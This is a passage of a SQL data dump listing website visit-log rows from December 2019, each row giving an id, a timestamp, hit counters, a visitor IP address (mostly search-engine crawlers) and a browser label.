41.8.188.25','other'),(470172,1576879023,1,1,0,0,'78.106.248.138','other'),(470173,1576879423,2,2,0,0,'66.249.64.26','chrome'),(470174,1576880005,1,1,0,0,'66.249.64.27','chrome'),(470175,1576880879,2,2,0,0,'207.46.13.195','other'),(470176,1576881190,1,1,0,0,'66.249.64.26','chrome'),(470177,1576881666,1,1,0,0,'141.8.132.19','other'),(470178,1576881862,1,1,0,0,'54.36.149.26','other'),(470179,1576881950,1,1,0,0,'207.46.13.195','other'),(470180,1576882494,1,1,0,0,'46.4.33.48','other'),(470181,1576882644,1,1,0,0,'66.249.64.28','chrome'),(470182,1576882703,1,1,0,0,'66.249.64.27','chrome'),(470183,1576882728,2,2,0,0,'66.249.64.26','chrome'),(470184,1576882731,1,1,0,0,'141.8.142.50','other'),(470185,1576882992,1,1,0,0,'54.36.149.101','other'),(470186,1576883789,1,1,0,0,'54.36.149.44','other'),(470187,1576884269,2,2,0,0,'8.29.198.26','other'),(470188,1576884643,2,2,0,0,'207.46.13.195','other'),(470189,1576885538,1,1,0,0,'66.249.64.26','chrome'),(470190,1576885808,1,1,0,0,'178.137.165.188','msie'),(470191,1576885925,1,1,0,0,'95.108.213.61','other'),(470192,1576886663,1,1,0,0,'66.249.64.27','chrome'),(470193,1576886980,1,1,0,0,'141.8.142.50','other'),(470194,1576887891,1,1,0,0,'157.55.39.243','other'),(470195,1576888028,1,1,0,0,'66.249.64.26','chrome'),(470196,1576888170,2,2,0,0,'66.249.64.27','chrome'),(470197,1576888825,1,1,0,0,'185.183.96.122','chrome'),(470198,1576889714,1,1,0,0,'62.205.134.182','other'),(470199,1576890091,1,1,0,0,'54.36.149.75','other'),(470200,1576890745,1,1,0,0,'54.36.149.46','other'),(470201,1576890949,1,1,0,0,'207.46.13.195','other'),(470202,1576890988,1,1,0,0,'66.249.70.36','chrome'),(470203,1576891055,1,1,0,0,'66.249.64.27','chrome'),(470204,1576891822,1,1,0,0,'66.249.70.62','chrome'),(470205,1576891879,2,2,0,0,'66.249.64.26','chrome'),(470206,1576892043,1,1,0,0,'46.188.32.36','msie'),(470207,1576892166,2,2,0,0,'66.249.64.27','chrome'),(470208,1576893000,2,2,0,0,'66.249.64.26','chrome'),(470209,1576893002,1,1,0,0,'207.46.13.195','other'),(470210,1576893293,1,1,0,0,'54.36.149.26','other'),(470211,1576893308,2,2,0,0,'66.249.64.27','chrome'),(470212,1576894042,1,1,0,0,'66.249.70.36','chrome'),(470213,1576894614,1,1,0,0,'13.66.139.0','other'),(470214,1576894620,1,1,0,0,'54.36.149.3','other'),(470215,1576895138,2,2,0,0,'8.29.198.26','other'),(470216,1576895167,1,1,0,0,'91.196.178.132','firefox'),(470217,1576895416,2,2,0,0,'66.249.64.26','chrome'),(470218,1576895455,1,1,0,0,'54.36.149.0','other'),(470219,1576895636,1,1,0,0,'141.8.183.15','other'),(470220,1576896193,1,1,0,0,'66.249.64.27','chrome'),(470221,1576897227,1,1,0,0,'37.9.113.33','other'),(470222,1576897328,1,1,0,0,'91.209.11.236','other'),(470223,1576897817,2,2,0,0,'51.15.141.220','firefox'),(470224,1576898020,1,1,0,0,'87.250.224.90','other'),(470225,1576898629,1,1,0,0,'91.209.11.236','other'),(470226,1576899677,1,1,0,0,'54.184.143.211','chrome'),(470227,1576899681,1,1,0,0,'52.41.211.72','other'),(470228,1576900858,1,1,0,0,'46.211.159.156','chrome'),(470229,1576900894,1,1,0,0,'207.46.13.195','other'),(470230,1576900909,1,1,0,0,'5.45.207.49','other'),(470231,1576901232,1,1,0,0,'207.46.13.50','other'),(470232,1576902080,1,1,0,0,'66.249.64.26','chrome'),(470233,1576902506,1,1,0,0,'141.8.142.2','other'),(470234,1576903093,2,2,0,0,'66.249.64.26','chrome'),(470235,1576903269,4,4,0,0,'66.249.64.27','chrome'),(470236,1576904408,1,1,0,0,'137.226.113.21','firefox'),(470237,1576904931,1,1,0,0,'157.55.39.225','other'),(470238,1576905162,1,1,0,0,'54.36.149.43','other'),(470239,1576905956,1,1,0,0,'66.249.64.26','chrome'),(470240,1576906007,1,1,0,0,'8.29.198.26','other'),(470241,1576906472,1,1,0,0,'8.29.198.25','other'),(470242,1576906790,1,1,0,0,'62.205.134.182','other'),(470243,1576908229,1,1,0,0,'144.76.101.105','chrome'),(470244,1576908339,1,1,0,0,'137.226.113.42','firefox'),(470245,1576909741,1,1,0,0,'141.8.183.33','other'),(470246,1576910031,1,1,0,0,'91.196.178.9','chrome'),(470247,1576910099,1,1,0,0,'66.249.64.26','chrome'),(470248,1576910125,1,1,0,0,'95.132.8.223','chrome'),(470249,1576910217,1,1,0,0,'91.196.178.75','chrome'),(470250,1576910292,1,1,0,0,'157.55.39.161','other'),(470251,1576911998,1,1,0,0,'66.249.70.36','chrome'),(470252,1576912244,1,1,0,0,'157.55.39.161','other'),(470253,1576912749,1,1,0,0,'185.246.208.138','chrome'),(470254,1576913004,1,1,0,0,'66.249.64.26','chrome'),(470255,1576913162,1,1,0,0,'91.196.178.75','chrome'),(470256,1576913483,1,1,0,0,'54.36.149.6','other'),(470257,1576914100,1,1,0,0,'31.13.127.19','other'),(470258,1576914101,1,1,0,0,'31.13.127.4','other'),(470259,1576914253,1,1,0,0,'141.8.183.73','other'),(470260,1576915510,1,1,0,0,'92.63.111.27','chrome'),(470261,1576915657,1,1,0,0,'66.249.64.26','chrome'),(470262,1576915760,1,1,0,0,'66.249.70.62','chrome'),(470263,1576916169,2,2,0,0,'66.249.64.27','chrome'),(470264,1576916541,1,1,0,0,'91.196.178.75','chrome'),(470265,1576916599,1,1,0,0,'31.13.127.11','other'),(470266,1576916601,1,1,0,0,'31.13.127.24','other'),(470269,1576916755,1,1,0,0,'157.55.39.225','other'),(470270,1576916878,1,1,0,0,'8.29.198.26','other'),(470271,1576916913,1,1,0,0,'66.249.64.28','chrome'),(470272,1576917305,1,1,0,0,'209.17.96.74','other'),(470273,1576917334,1,1,0,0,'8.29.198.27','other'),(470274,1576917754,2,2,0,0,'178.154.171.134','other'),(470275,1576918442,1,1,0,0,'157.55.39.225','other'),(470276,1576918670,1,1,0,0,'207.46.13.50','other'),(470277,1576919822,1,1,0,0,'178.92.159.127','other'),(470278,1576919824,1,1,0,0,'178.92.159.127','msie'),(470279,1576919826,1,1,0,0,'178.92.159.127','chrome'),(470280,1576919858,2,2,0,0,'157.55.39.225','other'),(470281,1576920613,1,1,0,0,'207.46.13.50','other'),(470282,1576921682,1,1,0,0,'178.154.171.134','other'),(470283,1576921822,1,1,0,0,'69.171.251.4','other'),(470284,1576921823,1,1,0,0,'69.171.251.6','other'),(470285,1576922297,1,1,0,0,'157.55.39.225','other'),(470286,1576922647,1,1,0,0,'91.196.178.176','chrome'),(470287,1576922668,2,2,0,0,'178.154.171.134','other'),(470288,1576923238,2,2,0,0,'66.249.64.28','chrome'),(470289,1576923499,1,1,0,0,'207.46.13.50','other'),(470290,1576923564,1,1,0,0,'54.36.149.93','other'),(470291,1576924366,1,1,0,0,'157.55.39.225','other'),(470292,1576924419,1,1,0,0,'66.249.64.27','chrome'),(470293,1576924624,1,1,0,0,'178.154.171.127','other'),(470294,1576925509,1,0,1,0,'207.46.13.50',''),(470295,1576925563,1,1,0,0,'178.154.171.134','other'),(470296,1576925774,1,1,0,0,'207.46.13.50','other'),(470297,1576926507,1,1,0,0,'178.154.171.134','other'),(470298,1576926844,1,1,0,0,'66.249.64.28','chrome'),(470299,1576927706,1,1,0,0,'109.74.154.72','chrome'),(470300,1576927734,1,1,0,0,'8.29.198.27','other'),(470301,1576928198,1,1,0,0,'8.29.198.25','other'),(470302,1576928245,1,1,0,0,'66.249.64.27','chrome'),(470303,1576928470,2,2,0,0,'178.154.171.134','other'),(470304,1576928532,1,1,0,0,'66.249.70.33','chrome'),(470305,1576928562,2,2,0,0,'157.55.39.161','other'),(470306,1576928731,3,3,0,0,'207.46.13.50','other'),(470307,1576929622,1,1,0,0,'54.36.149.97','other'),(470308,1576931044,1,1,0,0,'141.8.132.19','other'),(470309,1576931261,1,1,0,0,'141.8.132.12','other'),(470310,1576931534,1,1,0,0,'137.226.113.26','other'),(470311,1576932374,1,1,0,0,'54.36.149.26','other'),(470312,1576932553,1,1,0,0,'195.10.210.70','chrome'),(470313,1576932872,1,1,0,0,'66.249.64.27','chrome'),(470314,1576933629,1,1,0,0,'66.249.64.26','chrome'),(470315,1576933851,1,1,0,0,'141.8.132.2','other'),(470316,1576934007,1,1,0,0,'46.211.247.220','chrome'),(470317,1576934283,1,1,0,0,'46.211.137.98','chrome'),(470318,1576934614,2,2,0,0,'207.46.13.50','other'),(470319,1576934676,1,1,0,0,'66.249.64.27','chrome'),(470320,1576935331,1,1,0,0,'34.236.122.72','firefox'),(470321,1576935974,2,2,0,0,'66.249.64.27','chrome'),(470322,1576936260,1,1,0,0,'141.8.188.25','other'),(470323,1576936370,1,1,0,0,'141.8.132.37','other'),(470324,1576936993,1,1,0,0,'193.46.210.220','chrome'),(470325,1576937142,1,1,0,0,'66.249.64.28','chrome'),(470326,1576937567,1,1,0,0,'5.45.207.65','other'),(470327,1576938597,2,2,0,0,'8.29.198.27','other'),(470328,1576939012,1,1,0,0,'141.8.132.12','other'),(470329,1576939218,1,1,0,0,'157.55.39.161','other'),(470330,1576939485,1,1,0,0,'141.8.142.119','other'),(470331,1576939531,1,1,0,0,'141.8.183.111','other'),(470332,1576939776,1,1,0,0,'54.36.149.89','other'),(470333,1576940158,1,1,0,0,'66.249.70.36','chrome'),(470334,1576940423,1,1,0,0,'37.9.113.202','other'),(470335,1576940494,3,3,0,0,'66.249.64.27','chrome'),(470336,1576941217,1,1,0,0,'66.249.64.26','chrome'),(470337,1576941429,1,1,0,0,'66.249.64.28','chrome'),(470338,1576941563,1,1,0,0,'34.222.246.98','firefox'),(470339,1576942082,3,3,0,0,'104.197.219.192','chrome'),(470340,1576942101,1,1,0,0,'5.196.11.146','firefox'),(470341,1576942152,3,3,0,0,'34.68.255.216','chrome'),(470342,1576942161,1,1,0,0,'31.13.127.23','other'),(470345,1576942162,1,1,0,0,'31.13.127.8','other'),(470346,1576942172,2,2,0,0,'35.225.196.51','chrome'),(470348,1576942190,3,3,0,0,'35.184.98.4','chrome'),(470349,1576942207,3,3,0,0,'35.232.252.93','chrome'),(470350,1576942218,2,2,0,0,'34.66.141.160','chrome'),(470352,1576942508,2,2,0,0,'178.154.171.134','other'),(470353,1576942602,1,1,0,0,'141.8.142.2','other'),(470354,1576942670,1,1,0,0,'198.211.120.8','firefox'),(470355,1576942679,1,1,0,0,'66.249.70.36','chrome'),(470356,1576943410,1,1,0,0,'66.249.70.62','chrome'),(470357,1576944464,1,1,0,0,'178.154.171.134','other'),(470358,1576944680,1,1,0,0,'66.249.70.62','chrome'),(470359,1576944800,1,1,0,0,'139.59.89.178','firefox'),(470360,1576945356,1,1,0,0,'13.210.117.199','firefox'),(470361,1576945388,2,1,1,0,'157.55.39.161',''),(470362,1576945561,1,1,0,0,'46.211.128.220','chrome'),(470363,1576945573,1,1,0,0,'66.249.70.33','chrome'),(470364,1576945683,2,2,0,0,'66.249.64.28','chrome'),(470365,1576945866,2,1,1,0,'157.55.39.161',''),(470366,1576945920,1,1,0,0,'66.249.64.26','chrome'),(470367,1576945986,1,1,0,0,'51.89.157.100','firefox'),(470368,1576946671,1,1,0,0,'191.252.186.199','firefox'),(470369,1576948312,1,1,0,0,'66.249.70.36','chrome'),(470370,1576948937,2,2,0,0,'66.249.64.28','chrome'),(470371,1576949076,1,1,0,0,'178.154.171.134','other'),(470372,1576949287,1,1,0,0,'178.154.171.127','other'),(470373,1576949297,1,1,0,0,'176.36.168.224','chrome'),(470374,1576949382,1,1,0,0,'46.211.154.184','chrome'),(470375,1576949483,1,1,0,0,'8.29.198.26','other'),(470376,1576949506,1,1,0,0,'66.249.70.62','chrome'),(470377,1576949676,1,1,0,0,'66.249.64.27','chrome'),(470378,1576949933,1,1,0,0,'8.29.198.25','other'),(470379,1576950440,1,1,0,0,'178.154.171.134','other'),(470380,1576950623,1,1,0,0,'91.196.178.129','firefox'),(470381,1576951013,1,1,0,0,'66.249.64.26','chrome'),(470382,1576951270,1,1,0,0,'107.178.36.26','chrome'),(470383,1576952090,1,1,0,0,'66.249.64.27','chrome'),(470384,1576952616,1,1,0,0,'66.249.64.28','chrome'),(470385,1576952680,1,1,0,0,'37.9.113.10','other'),(470386,1576952863,1,1,0,0,'95.28.93.27','chrome'),(470387,1576953717,1,1,0,0,'141.8.183.111','other'),(470388,1576953995,1,1,0,0,'91.196.178.10','chrome'),(470389,1576955747,1,1,0,0,'141.8.142.177','other'),(470390,1576956149,2,2,0,0,'46.211.244.3','chrome'),(470391,1576956841,1,1,0,0,'141.8.188.12','other'),(470392,1576956929,1,1,0,0,'188.243.97.110','chrome'),(470393,1576957948,2,2,0,0,'66.249.64.28','chrome'),(470394,1576958626,1,1,0,0,'185.11.31.72','chrome'),(470395,1576959036,1,0,1,0,'66.249.70.33',''),(470396,1576959068,2,2,0,0,'66.249.64.27','chrome'),(470397,1576959684,1,1,0,0,'66.249.70.33','chrome'),(470398,1576960011,2,2,0,0,'66.249.64.26','chrome'),(470399,1576960015,1,1,0,0,'54.36.149.33','other'),(470400,1576960341,1,1,0,0,'8.29.198.27','other'),(470401,1576960806,1,1,0,0,'8.29.198.26','other'),(470402,1576960904,2,2,0,0,'91.193.166.99','other'),(470403,1576961725,1,1,0,0,'207.46.13.111','other'),(470404,1576962981,1,1,0,0,'31.13.127.11','other'),(470405,1576962982,1,1,0,0,'31.13.127.3','other'),(470407,1576962983,1,1,0,0,'31.13.127.4','other'),(470408,1576963930,1,1,0,0,'51.255.109.171','firefox'),(470409,1576963935,1,1,0,0,'51.255.109.166','firefox'),(470410,1576964773,2,2,0,0,'178.154.171.134','other'),(470411,1576965107,1,1,0,0,'196.45.48.48','firefox'),(470412,1576965423,1,1,0,0,'141.8.132.2','other'),(470413,1576966083,1,1,0,0,'207.46.13.111','other'),(470414,1576966427,1,1,0,0,'141.8.132.12','other'),(470415,1576966469,1,1,0,0,'66.249.64.27','chrome'),(470416,1576966487,1,1,0,0,'178.154.171.134','other'),(470417,1576967511,2,2,0,0,'66.249.64.28','chrome'),(470418,1576967563,1,1,0,0,'178.154.171.134','other'),(470419,1576969758,1,1,0,0,'207.46.13.70','other'),(470420,1576970121,1,1,0,0,'37.9.113.163','other'),(470421,1576970284,1,1,0,0,'141.8.183.73','other'),(470422,1576970716,1,1,0,0,'207.46.13.70','other'),(470423,1576971226,1,1,0,0,'8.29.198.27','other'),(470424,1576971631,1,1,0,0,'178.154.171.134','other'),(470425,1576971659,1,1,0,0,'8.29.198.26','other'),(470426,1576971866,1,1,0,0,'66.249.64.28','chrome'),(470427,1576972995,1,1,0,0,'18.191.251.184','chrome'),(470428,1576973539,1,1,0,0,'178.154.171.134','other'),(470429,1576974012,1,1,0,0,'66.249.64.28','chrome'),(470430,1576974655,1,1,0,0,'66.249.64.26','chrome'),(470431,1576975514,2,2,0,0,'66.249.64.27','chrome'),(470432,1576975613,1,1,0,0,'66.249.70.36','chrome'),(470433,1576975641,2,2,0,0,'207.46.13.153','other'),(470434,1576975735,1,1,0,0,'141.8.142.50','other'),(470435,1576976113,1,1,0,0,'62.205.134.182','other'),(470436,1576976710,1,1,0,0,'178.154.171.134','other'),(470437,1576976745,1,1,0,0,'66.249.64.28','chrome'),(470438,1576977184,2,0,2,0,'207.46.13.153',''),(470439,1576977557,1,1,0,0,'207.46.13.153','other'),(470440,1576978589,1,1,0,0,'207.46.13.153','other'),(470441,1576978697,1,1,0,0,'66.249.64.26','chrome'),(470442,1576978707,1,1,0,0,'66.249.64.27','chrome'),(470443,1576980030,2,2,0,0,'66.249.64.28','chrome'),(470444,1576980132,1,1,0,0,'66.249.64.27','chrome'),(470445,1576981686,1,1,0,0,'207.46.13.111','other'),(470446,1576982093,1,1,0,0,'8.29.198.26','other'),(470447,1576982231,1,1,0,0,'66.249.70.36','chrome'),(470448,1576982504,1,1,0,0,'8.29.198.27','other'),(470449,1576982743,1,1,0,0,'178.154.171.134','other'),(470450,1576982986,1,1,0,0,'141.8.142.2','other'),(470451,1576983264,1,1,0,0,'207.46.13.70','other'),(470452,1576983776,2,1,1,0,'207.46.13.153',''),(470453,1576984239,2,1,1,0,'207.46.13.153',''),(470454,1576984948,1,1,0,0,'178.154.171.134','other'),(470455,1576984966,1,1,0,0,'66.249.64.28','chrome'),(470456,1576985314,3,1,2,0,'207.46.13.111',''),(470457,1576986063,1,1,0,0,'178.154.171.127','other'),(470458,1576987219,1,1,0,0,'178.154.171.134','other'),(470459,1576987223,1,1,0,0,'141.8.142.2','other'),(470460,1576987651,1,1,0,0,'207.46.13.153','other'),(470461,1576988148,1,1,0,0,'69.4.89.106','firefox'),(470463,1576988288,1,1,0,0,'178.154.171.127','other'),(470464,1576989620,1,1,0,0,'66.249.64.28','chrome'),(470465,1576989654,1,1,0,0,'207.46.13.153','other'),(470466,1576989685,1,1,0,0,'51.68.152.26','chrome'),(470467,1576989870,1,1,0,0,'91.196.178.136','chrome'),(470468,1576989988,1,1,0,0,'207.46.13.111','other'),(470469,1576991088,1,1,0,0,'93.119.227.19','other'),(470470,1576991089,1,1,0,0,'93.119.227.19','chrome'),(470471,1576991347,1,1,0,0,'207.46.13.153','other'),(470472,1576991411,1,1,0,0,'66.249.64.27','chrome'),(470473,1576991999,2,2,0,0,'93.119.227.91','chrome'),(470474,1576992220,2,2,0,0,'69.4.87.74','firefox'),(470475,1576992298,1,1,0,0,'178.154.171.134','other'),(470476,1576992937,1,1,0,0,'207.148.93.136','other'),(470477,1576992938,1,1,0,0,'207.148.93.136','chrome'),(470478,1576992942,1,1,0,0,'8.29.198.27','other'),(470479,1576992963,1,1,0,0,'66.249.64.28','chrome'),(470480,1576993264,1,1,0,0,'62.205.134.182','other'),(470481,1576993370,1,1,0,0,'8.29.198.25','other'),(470482,1576993931,1,1,0,0,'141.8.132.12','other'),(470483,1576995333,1,1,0,0,'141.8.142.115','other'),(470484,1576995375,1,1,0,0,'141.8.188.12','other'),(470485,1576995659,1,1,0,0,'91.196.178.179','chrome'),(470486,1576997092,1,1,0,0,'66.249.64.28','chrome'),(470487,1576997974,1,1,0,0,'37.9.113.163','other'),(470488,1576998150,1,1,0,0,'93.119.227.34','firefox'),(470490,1576999542,2,2,0,0,'178.154.171.134','other'),(470491,1576999661,1,1,0,0,'178.154.171.127','other'),(470492,1577000193,4,4,0,0,'60.191.38.77','firefox'),(470493,1577000745,1,1,0,0,'78.106.248.138','other'),(470494,1577000777,1,1,0,0,'178.154.171.127','other'),(470495,1577001097,1,1,0,0,'91.215.70.239','chrome'),(470496,1577002672,2,2,0,0,'178.154.171.134','other'),(470497,1577003997,1,1,0,0,'8.29.198.26','other'),(470498,1577004333,1,1,0,0,'8.29.198.25','other'),(470499,1577004483,1,1,0,0,'207.46.13.153','other'),(470500,1577004910,1,1,0,0,'13.66.139.0','other'),(470501,1577005243,1,1,0,0,'178.154.171.66','other'),(470502,1577005546,1,1,0,0,'95.108.181.104','other'),(470503,1577006741,1,1,0,0,'178.154.171.134','other'),(470504,1577008624,2,2,0,0,'178.154.171.134','other'),(470505,1577008703,1,1,0,0,'45.32.110.187','chrome'),(470506,1577009801,1,0,1,0,'207.46.13.153',''),(470507,1577009949,1,1,0,0,'66.249.64.28','chrome'),(470508,1577011421,1,1,0,0,'207.46.13.234','other'),(470509,1577011941,1,1,0,0,'31.13.127.10','other'),(470510,1577011942,1,1,0,0,'31.13.127.17','other'),(470511,1577011964,1,1,0,0,'178.154.171.134','other'),(470512,1577013054,1,1,0,0,'13.66.139.0','other'),(470513,1577013296,1,1,0,0,'66.249.64.28','chrome'),(470514,1577013550,1,1,0,0,'66.249.64.26','chrome'),(470515,1577013707,1,1,0,0,'178.154.171.134','other'),(470516,1577013777,1,1,0,0,'109.74.154.72','chrome'),(470517,1577014259,1,1,0,0,'207.46.13.172','other'),(470518,1577014907,1,1,0,0,'8.29.198.25','other'),(470519,1577014946,1,1,0,0,'178.154.171.134','other'),(470520,1577015068,1,1,0,0,'46.211.138.211','chrome'),(470521,1577015243,3,3,0,0,'207.46.13.172','other'),(470522,1577015328,1,1,0,0,'18.202.179.74','chrome'),(470523,1577015350,1,1,0,0,'8.29.198.26','other'),(470524,1577015353,1,1,0,0,'66.249.64.27','chrome'),(470525,1577015404,3,3,0,0,'157.55.39.195','other'),(470526,1577017286,3,3,0,0,'157.55.39.195','other'),(470527,1577017290,1,1,0,0,'207.46.13.234','other'),(470528,1577017430,1,1,0,0,'207.46.13.172','other'),(470529,1577018215,1,1,0,0,'176.125.52.48','chrome'),(470530,1577019384,1,1,0,0,'91.196.178.18','chrome'),(470531,1577019831,2,2,0,0,'157.55.39.195','other'),(470532,1577020735,2,2,0,0,'207.46.13.172','other'),(470533,1577020932,1,1,0,0,'66.249.64.27','chrome'),(470534,1577021733,1,1,0,0,'207.46.13.172','other'),(470535,1577022809,1,0,1,0,'66.249.64.28',''),(470536,1577023283,1,1,0,0,'157.55.39.195','other'),(470537,1577024714,1,1,0,0,'66.249.64.27','chrome'),(470538,1577025250,1,1,0,0,'207.46.13.153','other'),(470539,1577025782,1,1,0,0,'8.29.198.25','other'),(470540,1577026173,2,2,0,0,'157.55.39.195','other'),(470541,1577026226,1,1,0,0,'8.29.198.26','other'),(470542,1577026768,1,1,0,0,'178.154.171.134','other'),(470543,1577026897,1,1,0,0,'31.13.115.16','other'),(470544,1577026898,1,1,0,0,'31.13.115.22','other'),(470545,1577026925,1,1,0,0,'31.13.115.10','other'),(470546,1577026926,1,1,0,0,'31.13.115.15','other'),(470547,1577027820,3,3,0,0,'178.154.171.134','other'),(470548,1577028709,1,1,0,0,'92.112.207.249','firefox'),(470549,1577031824,2,2,0,0,'157.55.39.195','other'),(470550,1577031891,25,25,0,0,'178.137.165.188','chrome'),(470551,1577032153,1,1,0,0,'207.46.13.234','other'),(470552,1577032301,2,2,0,0,'207.46.13.226','other'),(470553,1577032335,1,1,0,0,'178.154.171.134','other'),(470554,1577032424,1,1,0,0,'207.46.13.172','other'),(470555,1577032482,1,1,0,0,'13.66.139.0','other'),(470556,1577032534,1,1,0,0,'66.249.64.28','chrome'),(470557,1577033408,1,1,0,0,'66.249.64.26','chrome'),(470558,1577033765,2,2,0,0,'157.55.39.129','other'),(470559,1577034011,1,1,0,0,'13.66.139.0','other'),(470560,1577034159,1,1,0,0,'157.55.39.195','other'),(470561,1577034746,2,2,0,0,'178.154.171.134','other'),(470562,1577034826,1,1,0,0,'157.55.39.129','other'),(470563,1577035242,1,1,0,0,'157.55.39.195','other'),(470564,1577035615,1,1,0,0,'207.46.13.226','other'),(470565,1577036027,1,1,0,0,'66.249.64.27','chrome'),(470566,1577036653,1,1,0,0,'8.29.198.25','other'),(470567,1577037055,1,1,0,0,'31.13.127.5','other'),(470568,1577037056,1,1,0,0,'31.13.127.11','other'),(470569,1577037127,1,1,0,0,'8.29.198.26','other'),(470570,1577037429,3,3,0,0,'157.55.39.195','other'),(470571,1577038108,2,2,0,0,'89.163.242.186','other'),(470572,1577038627,1,1,0,0,'141.8.188.12','other'),(470573,1577039365,1,1,0,0,'157.55.39.195','other'),(470574,1577040057,1,1,0,0,'207.46.13.234','other'),(470575,1577040374,1,1,0,0,'141.8.142.161','other'),(470576,1577040921,1,1,0,0,'37.9.113.202','other'),(470577,1577041015,1,1,0,0,'91.196.178.177','chrome'),(470578,1577041105,2,2,0,0,'207.46.13.172','other'),(470579,1577041921,1,1,0,0,'157.55.39.195','other'),(470580,1577042704,1,1,0,0,'141.8.142.161','other'),(470581,1577043368,1,1,0,0,'157.55.39.129','other'),(470582,1577044288,1,1,0,0,'141.8.188.12','other'),(470583,1577047477,2,2,0,0,'157.55.39.129','other'),(470584,1577047524,1,1,0,0,'8.29.198.27','other'),(470585,1577047810,1,1,0,0,'141.8.183.33','other'),(470586,1577047995,1,1,0,0,'8.29.198.26','other'),(470587,1577048795,1,1,0,0,'157.55.39.129','other'),(470588,1577049883,1,1,0,0,'66.249.64.28','chrome'),(470589,1577050874,1,1,0,0,'157.55.39.129','other'),(470590,1577051816,1,1,0,0,'66.249.64.27','chrome'),(470591,1577052913,2,2,0,0,'66.249.70.62','chrome'),(470592,1577053192,1,1,0,0,'66.249.64.26','chrome'),(470593,1577053222,1,1,0,0,'66.249.64.27','chrome'),(470594,1577054104,1,1,0,0,'141.8.183.67','other'),(470595,1577054255,1,1,0,0,'128.74.244.108','msie'),(470596,1577054371,1,1,0,0,'66.249.64.28','chrome'),(470597,1577054488,1,1,0,0,'66.249.64.26','chrome'),(470598,1577054515,1,1,0,0,'66.249.64.27','chrome'),(470599,1577054668,1,0,1,0,'207.46.13.172',''),(470600,1577054858,2,1,1,0,'207.46.13.172',''),(470601,1577054900,1,1,0,0,'87.250.224.104','other'),(470602,1577055249,1,1,0,0,'141.8.183.73','other'),(470603,1577055477,1,1,0,0,'66.249.64.27','chrome'),(470604,1577056263,1,1,0,0,'141.8.132.28','other'),(470605,1577056531,1,1,0,0,'66.249.64.26','chrome'),(470606,1577056745,1,1,0,0,'141.8.142.161','other'),(470607,1577057573,1,1,0,0,'66.249.64.28','chrome'),(470608,1577058395,1,1,0,0,'8.29.198.26','other'),(470609,1577058873,1,1,0,0,'8.29.198.25','other'),(470610,1577059527,1,1,0,0,'46.229.60.66','other'),(470611,1577060148,2,2,0,0,'157.55.39.129','other'),(470612,1577062480,1,1,0,0,'192.162.35.78','other'),(470613,1577062953,1,1,0,0,'66.249.64.27','chrome'),(470614,1577064523,1,1,0,0,'157.55.39.129','other'),(470615,1577064624,1,1,0,0,'207.46.13.172','other'),(470616,1577065083,1,1,0,0,'141.8.188.38','other'),(470617,1577066134,1,1,0,0,'141.8.188.38','other'),(470618,1577066167,1,1,0,0,'141.8.142.2','other'),(470619,1577066194,1,1,0,0,'157.55.39.129','other'),(470620,1577066806,2,2,0,0,'80.84.57.100','chrome'),(470621,1577066819,1,1,0,0,'80.84.57.112','chrome'),(470622,1577066827,1,1,0,0,'80.84.57.98','firefox'),(470623,1577066843,2,2,0,0,'80.84.57.98','chrome'),(470624,1577066850,1,1,0,0,'80.84.57.118','chrome'),(470625,1577066858,2,2,0,0,'80.84.57.95','chrome'),(470626,1577066865,1,1,0,0,'80.84.57.97','chrome'),(470627,1577066880,1,1,0,0,'80.84.57.94','firefox'),(470628,1577066984,1,1,0,0,'80.84.57.106','chrome'),(470629,1577066992,1,1,0,0,'80.84.57.92','firefox'),(470630,1577067000,1,1,0,0,'80.84.57.96','chrome'),(470631,1577067007,1,1,0,0,'80.84.57.118','firefox'),(470632,1577067019,1,1,0,0,'80.84.57.116','chrome'),(470633,1577067037,1,1,0,0,'80.84.57.107','chrome'),(470634,1577067043,1,1,0,0,'80.84.57.93','chrome'),(470635,1577067736,2,2,0,0,'207.46.13.172','other'),(470636,1577068246,1,1,0,0,'66.249.64.26','chrome'),(470637,1577068274,1,1,0,0,'141.8.142.2','other'),(470638,1577069257,1,1,0,0,'8.29.198.25','other'),(470639,1577069380,1,1,0,0,'5.45.207.65','other'),(470640,1577069756,1,1,0,0,'8.29.198.27','other'),(470641,1577069998,2,0,2,0,'207.46.13.172',''),(470642,1577070641,1,1,0,0,'66.249.64.27','chrome'),(470643,1577070749,3,3,0,0,'91.53.42.77','other'),(470644,1577071108,1,0,1,0,'66.249.64.26',''),(470645,1577071392,1,1,0,0,'157.55.39.129','other'),(470646,1577071840,2,2,0,0,'66.249.64.28','chrome'),(470647,1577072616,1,1,0,0,'66.249.64.26','chrome'),(470648,1577072717,1,1,0,0,'141.8.183.111','other'),(470649,1577072991,1,1,0,0,'157.55.39.178','other'),(470650,1577073783,1,1,0,0,'141.8.188.39','other'),(470651,1577074050,2,2,0,0,'88.198.33.145','other'),(470652,1577074296,1,1,0,0,'157.55.39.4','other'),(470653,1577074737,1,1,0,0,'46.188.98.10','chrome'),(470654,1577074802,1,1,0,0,'37.9.113.6','other'),(470655,1577075252,1,1,0,0,'207.46.13.172','other'),(470656,1577075689,2,0,2,0,'157.55.39.178',''),(470657,1577075955,1,1,0,0,'141.8.188.38','other'),(470658,1577077435,1,1,0,0,'66.249.70.62','chrome'),(470659,1577078261,1,1,0,0,'207.46.13.172','other'),(470660,1577079301,1,1,0,0,'157.55.39.4','other'),(470661,1577079763,2,2,0,0,'207.46.13.172','other'),(470662,1577080038,1,1,0,0,'37.9.113.10','other'),(470663,1577080128,1,1,0,0,'8.29.198.25','other'),(470664,1577080656,1,1,0,0,'8.29.198.26','other'),(470665,1577082232,1,1,0,0,'66.249.64.28','chrome'),(470666,1577082859,1,1,0,0,'91.196.177.46','chrome'),(470667,1577083113,1,1,0,0,'157.55.39.178','other'),(470668,1577083265,1,1,0,0,'87.250.224.90','other'),(470669,1577083306,1,1,0,0,'66.249.64.26','chrome'),(470670,1577083566,1,1,0,0,'37.9.113.163','other'),(470671,1577083593,1,1,0,0,'5.45.207.65','other'),(470672,1577084119,1,1,0,0,'157.55.39.4','other'),(470673,1577084579,1,1,0,0,'176.111.33.18','firefox'),(470674,1577084816,1,1,0,0,'115.113.55.34','chrome'),(470675,1577084818,1,1,0,0,'157.55.39.215','other'),(470676,1577085207,1,1,0,0,'46.133.17.45','chrome'),(470677,1577085681,1,1,0,0,'157.55.39.4','other'),(470678,1577085727,1,1,0,0,'66.249.64.27','chrome'),(470679,1577086688,1,1,0,0,'141.8.132.12','other'),(470680,1577086761,1,1,0,0,'66.249.64.26','chrome'),(470681,1577087510,2,2,0,0,'157.55.39.4','other'),(470682,1577087929,1,1,0,0,'178.154.171.134','other'),(470683,1577087968,1,1,0,0,'91.196.177.15','chrome'),(470684,1577088320,1,